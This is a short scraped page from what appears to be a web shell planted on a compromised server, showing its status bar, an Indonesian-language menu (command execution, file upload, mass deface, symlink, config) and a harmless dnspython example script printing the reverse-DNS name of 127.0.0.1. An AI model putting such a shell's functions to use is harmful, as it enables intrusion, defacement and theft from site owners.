OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/share/python2-wheels/../doc/python3-html5lib/../python3-dns/examples/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
#!/usr/bin/env python from __future__ import print_function import dns.reversename n = dns.reversename.from_address("127.0.0.1") print(n) print(dns.reversename.to_address(n))